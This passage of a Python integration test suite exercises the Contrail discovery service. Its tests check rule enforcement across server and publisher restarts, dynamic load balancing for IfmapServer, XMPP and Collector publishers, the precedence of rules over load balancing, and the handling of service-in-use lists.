self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', compute_control_ip, 'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_discovery_server_restart_rule_present(self):
''' Validate that rules are followed even after discovery server restarts.
Steps:
1. Create rule for any Publisher and subscriber pair and verify
that rule is behaving properly.
2. Restart the discovery server on all config nodes.
3. Verify that after discovery server comes up again, rules are
still followed.
        Precondition: Assumption is that setup is having a contrail-control
        connected to 2 instances of Ifmap servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-control')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.cfgm_control_ips) > 0:
self.logger.info("\n Creating rules corresponding to *IfmapServer*\n \
running on all Config nodes for *contrail-control* running in same subnets")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("#### Verifying clients subscribed to publishers ###")
for i in range(0,len(self.inputs.cfgm_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-control',\
self.inputs.cfgm_control_ips[i], 'IfmapServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
self.logger.debug("#### Stopping the discovery server process on all nodes ###")
for ip in self.inputs.cfgm_ips:
self.inputs.stop_service('contrail-discovery', [ip])
self.logger.debug("\n #### Waiting for 60 seconds so that all clients\n \
again try to resubscribe when discovery server is down ###")
sleep(60)
self.logger.debug("#### Starting the discovery server process on all nodes ###")
for ip in self.inputs.cfgm_ips:
self.inputs.start_service('contrail-discovery', [ip])
for ip in self.inputs.cfgm_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-discovery',ip)
if client_status == False:
self.logger.error("Some issue happened after restart of discovery process")
result = False
assert result
self.logger.debug("\n #### Verifying clients subscribed to publishers\n \
as per rules, after discovery server restart ###")
for i in range(0,len(self.inputs.cfgm_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher(\
ds_ip, 'contrail-control',\
self.inputs.cfgm_control_ips[i],'IfmapServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("#### Stopping the discovery server process on all nodes ###")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_publisher_restart_rule_present(self):
''' Validate that rules are followed even after Publisher servers restarts.
Steps:
1. Create multiple rules for Publisher and subscriber pairs and
verify that all rules are behaving properly.
2. Restart the Publishers mentioned in the rules on all the
corresponding nodes.
3. Verify that after Publisher service restart, rules are still followed.
        Precondition: Assumption is that setup is having a vrouter connected
        to 2 instances of XMPP servers and Collectors running in different subnets
Also, setup requirement of this test case is to have at least 2
publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=True )
self.ds_obj.skip_discovery_test("Collector", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("\n Creating rules corresponding to *xmpp-server*,\n \
*dns-server* and *Collector* running on all control nodes for \n \
*contrail-vrouter-agent* running in same subnets")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(bgp_control_ip, \
'xmpp-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
rule_status = self.ds_obj.add_and_verify_rule(bgp_control_ip, \
'dns-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("#### Verifying clients subscribed to publishers ###")
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'xmpp-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'dns-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
self.logger.info("#### Restarting the xmpp, dns and Collector server process on all nodes ###")
for ip in self.inputs.collector_ips:
self.inputs.restart_service('contrail-collector', [ip])
for ip in self.inputs.bgp_ips:
self.inputs.restart_service('contrail-control', [ip])
self.inputs.restart_service('contrail-dns', [ip])
for ip in self.inputs.collector_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-collector', ip)
if client_status == False:
self.logger.error("Some issue happened after restart of server process")
result = False
assert result
for ip in self.inputs.bgp_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-control', ip)
if client_status == False:
self.logger.error("Some issue happened after restart of server process")
result = False
assert result
for ip in self.inputs.bgp_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-dns', ip)
if client_status == False:
self.logger.error("Some issue happened after restart of server process")
result = False
assert result
self.logger.debug("\n #### Waiting for 30 seconds so that all clients\n \
again try to resubscribe when discovery server is down ###")
sleep(30)
self.logger.debug("\n #### Verifying clients subscribed to publishers\n \
should follow rules even after publisher process restart ###")
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'xmpp-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'dns-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("#### Deleting the rules at end of test acse ###")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'xmpp-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'dns-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_auto_load_balance_Ifmap(self):
''' Validate that auto load balance works correctly for IfmapServer.
Steps:
1. Verify that normal load balancing is working correctly by
default on IfmapServer.
2. Set auto load balance as *True* and stop any one of the IfmapServers.
        3. Verify that the stopped Server loses all its subscribers.
4. Again start the IfmapServer which was stopped earlier.
5. Verify auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 Ifmap Servers
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'supervisor-control')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='dynamic-load-balance')
try:
self.logger.debug("# Verifying that discovery server auto load balance for 'IfmapServer' #")
self.logger.info("# Stopping the IfmapServer on one of the config node until it looses all subscribers #")
self.inputs.stop_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.cfgm_control_ips[0],\
'IfmapServer'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running, it still\n \
has %d *in use* subscription. Something is wrong #" % count)
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='load-balance')
result = False
assert result
self.logger.info("\n # Starting the IfmapServer on one of the config node\n \
expecting that subscriptions will happen again #")
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
client_status = self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of config server #")
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='load-balance')
result = False
assert result
self.logger.debug("# Waiting for 30 seconds for restarted server to again get all subscriptions #")
sleep(30)
self.logger.debug("# Verifying that auto load balance worked properly or not after service restart #")
load_balance = self.ds_obj.check_load_balance(ds_ip, 'IfmapServer')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Setting policy to 'load-balance' in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='load-balance')
try:
self.logger.debug("\n # Verifying that discovery server do not do\n \
auto load balance for *IfmapServer* as policy is set to 'load-balance' #")
self.logger.info("\n # Stopping the IfmapServer on one of the config\n \
node until it looses all subscribers #")
self.inputs.stop_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.cfgm_control_ips[0],\
'IfmapServer'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running, it still has %d\n \
*in use* subscription. Something is wrong #" % count)
result = False
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
assert result
self.logger.info("\n # Starting the IfmapServer on one of the config node\n \
expecting that re-subscription will not happen again as auto load balance is off #")
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
client_status = self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of config server #")
result = False
assert result
self.logger.debug("\n # Waiting for 30 seconds to wait for restarted server\n \
to give time in case any client subscribes to this server. Not expecting this to happen #")
sleep(30)
self.logger.debug("\n # Verifying that as auto load balance was off,\n \
the restarted service is not used by any subscriber #")
count=self.ds_obj.get_service_in_use(ds_ip, (self.inputs.cfgm_control_ips[0],\
'IfmapServer'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server has just restarted and \n \
auto load balance is off, it has got new subscriptions. Something is wrong #")
self.logger.error("# Total subscribers which got attached to restarted service are %d #"\
% count)
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_auto_load_balance_xmpp(self):
''' Validate that auto load balance works correctly for XmppServer.
This script also validates Bug 1395099 : Trigger subscription
from discovery client for faster convergence
Steps:
1. Verify that normal load balancing is working correctly by default
on Xmpp-Server.
2. Set auto load balance as *True* and stop any one of the Xmpp-Server.
        3. Verify that the stopped Server loses all its subscribers.
4. Again start the Xmpp-Server which was stopped earlier.
5. Verify auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 XMPP Servers
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='dynamic-load-balance')
try:
self.logger.debug("# Verifying that discovery server auto load balance for 'XmppServer' #")
self.logger.info("# Stopping the XmppServer on one of the control node until it looses all subscribers #")
self.inputs.stop_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.logger.debug("# Waiting for 20 seconds to wait for server to lose all subscriptions #")
sleep(20)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.bgp_control_ips[0],\
'xmpp-server'))
if count == 0:
self.logger.info("## After XMPP server is made down, it looses all subscriptions within 20 seconds")
pass
else:
self.logger.error("\n # Even if Server is not running, it still has %d\n \
*in use* subscription. Something is wrong #" % count)
result = False
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='load-balance')
assert result
self.logger.info("\n# Starting the XmppServer on one of the control node\n \
expecting that subscriptions will happen again #")
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of control server #")
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='load-balance')
result = False
assert result
self.logger.debug("# Waiting for 30 seconds for restarted server to again get all subscriptions#")
sleep(30)
self.logger.debug("# Verifying that auto load balance worked properly or not after service restart #")
load_balance = self.ds_obj.check_load_balance(ds_ip, 'xmpp-server')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Setting policy as 'load-balance' in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='load-balance')
try:
self.logger.debug("\n# Verifying that discovery server do not do\n \
auto load balance for *XmppServer* as policy is set to 'load-balance' #")
self.logger.info("\n# Stopping the XmppServer on one of the control \n \
node until it looses all subscribers #")
self.inputs.stop_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.logger.debug("# Waiting for 20 seconds to wait for server to lose all subscriptions #")
sleep(20)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.bgp_control_ips[0],\
'xmpp-server'))
if count == 0:
self.logger.info("## After XMPP server is made down, it looses all subscriptions within 20 seconds")
pass
else:
self.logger.error("\n# Even if Server is not running, it still has %d\n\
*in use* subscription. Something is wrong #" % count)
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
result = False
assert result
self.logger.info("\n# Starting the XmppServer on one of the control node\n \
expecting that re-subscription will not happen again as auto load balance is off #")
self.inputs.start_service('contrail-control',\
host_ips=[self.inputs.bgp_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-control',self.inputs.bgp_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of control server #")
result = False
assert result
self.logger.debug("\n# Waiting for 30 seconds for restarted server\n \
to give time in case any client subscribes to this server. \n \
Not expecting this to happen# ")
sleep(30)
self.logger.debug("\n# Verifying that as auto load balance was off,\n \
the restarted service is not used by any subscriber #")
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.bgp_control_ips[0],\
'xmpp-server'))
if count == 0:
pass
else:
self.logger.error("\n# Even if Server has just restarted and \n \
auto load balance is off, it has got new subscriptions. Something is wrong #")
self.logger.error("# Total subscribers which got attached to restarted service are %d #"\
% count)
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_auto_load_balance_collector(self):
''' Validate that auto load balance works correctly for Collector.
Steps:
1. Set auto load balance as *True* and stop any one of the Collector.
        2. Verify that the stopped Server loses all its subscribers.
3. Again start the Collector which was stopped earlier.
4. Verify auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 Collectors
'''
self.ds_obj.skip_discovery_test("Collector", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params('change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("#### Restarting the required subscriber services so that TTL takes effect immediately ###")
for ip in self.inputs.collector_ips:
self.inputs.restart_service('supervisor-analytics', [ip])
for ip in self.inputs.compute_ips:
self.inputs.restart_service('supervisor-vrouter', [ip])
for ip in self.inputs.bgp_ips:
self.inputs.restart_service('supervisor-control', [ip])
for ip in self.inputs.cfgm_ips:
self.inputs.restart_service('supervisor-config', [ip])
for ip in self.inputs.webui_ips:
self.inputs.restart_service('supervisor-webui', [ip])
for ip in self.inputs.database_ips:
self.inputs.restart_service('contrail-database', [ip])
self.inputs.restart_service('contrail-database-nodemgr', [ip])
client_status = ContrailStatusChecker()
client_status.wait_till_contrail_cluster_stable(self.inputs.host_ips)
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='dynamic-load-balance')
try:
self.logger.debug("# Verifying that discovery server auto load balance for 'Collector'#")
self.logger.info("# Stopping the Collector on one of the Analytic node until it looses all subscribers #")
self.inputs.stop_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.collector_control_ips[0],'Collector'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running,\n \
it still has %d *in use* subscription. Something is wrong #" % count)
result = False
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='load-balance')
assert result
self.logger.info("\n # Starting the Collector on one of the Analytic node\n \
expecting that subscriptions will happen again #")
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of Collector#")
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='load-balance')
result = False
assert result
self.logger.debug("# Waiting for 30 seconds for restarted server to again get all subscriptions #")
sleep(30)
self.logger.debug("# Verifying that auto load balance worked properly or not after service restart #")
load_balance = self.ds_obj.check_load_balance(ds_ip, 'Collector')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Setting policy as 'load-balance' in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="COLLECTOR",policy='load-balance')
try:
self.logger.debug("\n # Verifying that discovery server do not do\n \
auto load balance for *Collector* as it is set to load-balance #")
self.logger.info("\n # Stopping the Collector on one of the Analytic node\n \
until it looses all subscribers #")
self.inputs.stop_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.collector_control_ips[0],'Collector'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running, it still has %d\n \
*in use* subscription. Something is wrong #" % count)
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
result = False
assert result
self.logger.info("\n # Starting the Collector on one of the Analytic node\n \
expecting that re-subscription will not happen again as auto load balance is off # ")
self.inputs.start_service('contrail-collector',\
host_ips=[self.inputs.collector_ips[0]])
client_status = self.inputs.confirm_service_active(\
'contrail-collector',self.inputs.collector_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of Collector #")
result = False
assert result
self.logger.debug("\n # Waiting for 30 seconds for restarted server\n \
to give time in case any client subscribes to this server. Not expecting this to happen #")
sleep(30)
self.logger.debug("\n # Verifying that as auto load balance was off,\n \
the restarted service is not used by any subscriber #")
count = self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.collector_control_ips[0],'Collector'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server has just restarted and \n \
auto load balance is off, it has got new subscriptions. Something is wrong #" )
self.logger.error("# Total subscribers which got attached to restarted service are %d #" % count)
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rules_preferred_over_auto_load_balance(self):
        ''' Validate that rules always take precedence over auto load balance.
Also verify that when rules are deleted, auto load balance takes its effect.
Steps:
1. Verify that normal load balancing is working correctly by default
on XMpp-Server.
2. Set auto load balance as *True* and stop any one of the Xmpp-Server.
3. Create multiple rules with single xmpp-server to subscribe to all
vrouter-agents in the topology.
4. Verify that rule is preferred over load balancing and no other
xmpp-server in the topology gets any subscription.
5. Delete the rules and verify that auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 XMPP Servers
Also, all XMPP Servers should be in different subnet
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="XMPP-SERVER",policy='dynamic-load-balance')
self.logger.debug("# Waiting for 30 seconds to wait for auto load balance to happen #")
sleep(30)
try:
self.logger.info("# Verifying that discovery server is properly load balancing for 'XmppServer' # ")
load_balance = self.ds_obj.check_load_balance(ds_ip,'xmpp-server')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
if len(self.inputs.bgp_control_ips) > 0:
self.logger.info("\n # Creating rules corresponding to *xmpp-server*\n \
so that all *contrail-vrouter-agent* on any network connects to\n \
*xmpp-server* running on cfgm0 #")
for i in range(0,len(self.inputs.compute_control_ips)):
rule_status = self.ds_obj.add_and_verify_rule(\
self.inputs.bgp_control_ips[0], 'xmpp-server',\
self.inputs.compute_control_ips[i], 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.info("#### Verifying that all vrouter-agents subscribe to control node xmpp-server only ###")
try:
in_use_list = []
for i in range(0,len(self.inputs.bgp_control_ips)):
in_use_list_elem = self.ds_obj.get_service_in_use\
(ds_ip, (self.inputs.bgp_control_ips[i],'xmpp-server'))
in_use_list.append(in_use_list_elem)
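            # Rules should win over dynamic load balancing: only the first
            # control node's xmpp-server should hold any subscriptions.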
if in_use_list[0] > 0 and sum(in_use_list[1:len(in_use_list)]) == 0:
self.logger.info("# Rule working as expected. All clients subscribed only to cfgm0 xmpp-server #")
self.logger.info("# Even if Auto load balance is *True*, rule is taking the priority #")
pass
else:
self.logger.error("\n# Even if rule is applied, rule is not working as expected.\n \
May be auto load balance being *True* is creating issue #")
self.logger.error("\n# It was expected that only cfgm0 xmpp-server\n \
will have subscriptions and rest of the xmpp-servers will not have any subscriptions #")
self.logger.error("\n# The *in-use* list for all xmpp-servers is %s#"\
% in_use_list)
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
rule_status = self.ds_obj.delete_and_verify_rule(\
self.inputs.bgp_control_ips[0], 'xmpp-server',\
self.inputs.compute_control_ips[i], 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
try:
self.logger.info("\n # Waiting for 60 seconds(2 TTL cycles)\n \
to wait for re-subscription and load-balancing to happen after deleting rules #")
sleep(60)
self.logger.info("\n # Verifying that discovery server \n \
auto load balance for 'XmppServer' as soon as rules are deleted #")
load_balance = self.ds_obj.check_load_balance(ds_ip,'xmpp-server')
if load_balance == False:
result=False
except Exception as e:
self.logger.error(e)
result = False
self.logger.info(" # Deleting the policy configuration from contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'del_policy',\
publisher_type="XMPP-SERVER")
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_service_in_use_list(self):
''' Validate that subscribe request with instance value as 0 and having
service-in-use-list is considered a subscription request and
publishers are assigned to it properly.
Steps:
1. Get in-use count of publishers before sending a subscribe
request having service-in-use list
2. Send a subscribe request with instance value as '0' and
service-in-use list present in that subscribe request.
3. See if the in-use count of the publisher increases and client
get subscribed successfully.
Precondition: Assumption is that setup is having at least 3 Ifmap Servers
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
try:
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params(operation='change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("\n# Verifying that if a subscriber has a service in use list,\n\
same publishers are assigned to it as mentioned in the list.# ")
self.logger.info("\n#### Getting the in-use count of all Ifmap Servers \n\
before sending dummy subscribe request ###")
in_use_list = []
for i in range(0,len(self.inputs.cfgm_control_ips)):
in_use_list_elem = self.ds_obj.get_service_in_use(ds_ip,\
(self.inputs.cfgm_control_ips[i],'IfmapServer'))
in_use_list.append(in_use_list_elem)
sum_in_use_bfr_subscribe_request = sum(in_use_list)
self.logger.info("\n#### Total in-use clients subscribed to IfmapServer are %d #####"\
% sum_in_use_bfr_subscribe_request)
self.logger.info("\n#### Sending a dummy client request with instance value as 0\n\
to subscribe to IfmapServer #####")
self.logger.info("\n#### The dummy request will have a service-in-use-list \n\
containing IPs of all Ifmap Server present in the network #####")
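            # instances="0" together with a service-in-use list asks discovery to
            # honour the publishers already listed instead of allocating new ones;
            # all IfmapServer IPs are passed, so the check below expects every one
            # of them to be granted to this client.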
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="0", min_instances=len(self.inputs.cfgm_control_ips),\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr=self.inputs.compute_control_ips[0],client_type="TestClient",\
svc_in_use_list_present=True,svc_in_use_list=self.inputs.cfgm_control_ips)
sleep(2)
self.logger.info("\n#### Getting the in-use count of all Ifmap Servers \n\
after sending dummy subscribe request ###")
in_use_list = []
for i in range(0,len(self.inputs.cfgm_control_ips)):
in_use_list_elem = self.ds_obj.get_service_in_use(ds_ip, \
(self.inputs.cfgm_control_ips[i],'IfmapServer'))
in_use_list.append(in_use_list_elem)
sum_in_use_aftr_subscribe_request = sum(in_use_list)
self.logger.info("\n Total in-use clients subscribed to IfmapServer after dummy request are %d"\
% sum_in_use_aftr_subscribe_request)
